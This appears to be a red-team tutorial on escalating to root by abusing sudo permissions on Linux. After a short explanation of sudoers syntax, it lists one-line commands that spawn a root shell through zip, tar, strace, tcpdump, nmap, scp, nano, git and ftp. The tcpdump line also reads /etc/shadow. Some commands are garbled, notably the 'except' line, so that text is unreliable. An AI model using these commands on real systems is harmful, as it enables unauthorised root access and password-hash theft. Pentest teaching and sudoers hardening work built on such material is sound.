Index
- What is SUDO?
- Scenario.
- Sudoer FIle Syntax.
- Exploiting SUDO
- zip
- tar
- strace
- tcpdump
- nmap
- scp
- except
- nano & pico
- git
- ftp/gdb
What is SUDO ??
The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers
file.
Scenario.
During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.
Sudoer File Syntax.
root ALL=(ALL) ALL
Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
The first part is the user, the second is the terminal from where the user can use the sudo
command, the third part is which users he may act as, and the last one is which commands he may run when using.sudo
touhid ALL= /sbin/poweroff
Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.
touhid ALL = (root) NOPASSWD: /usr/bin/find
Explain 3: The above command, make the user touhid can from any terminal, run the command find as root user without password.
Exploiting SUDO Users.
To Exploiting sudo user u need to find which command u have to allow.sudo -l
The above command shows which command have allowed to the current user.
Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.
Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.
Using zip command
$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
Using tar command
$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash
Using strace command
$ sudo strace -o/dev/null /bin/bash
Using tcpdump command
$ echo $’id cat /etc/shadow’ > /tmp/.shell $ chmod +x /tmp/.shell $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
Using nmap command
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse $ sudo nmap --script=/tmp/shell.nse
Using scp command
$ sudo scp -S /path/yourscript x y
Using except command
$ sudo except spawn sh then sh
Using nano command
$ sudo nano -S /bin/bash
type your command and hit CTRL+T
Using git command
$ sudo git help status
type: !/bin/bash
Using gdb/ftp command
$ sudo ftp
type : !/bin/sh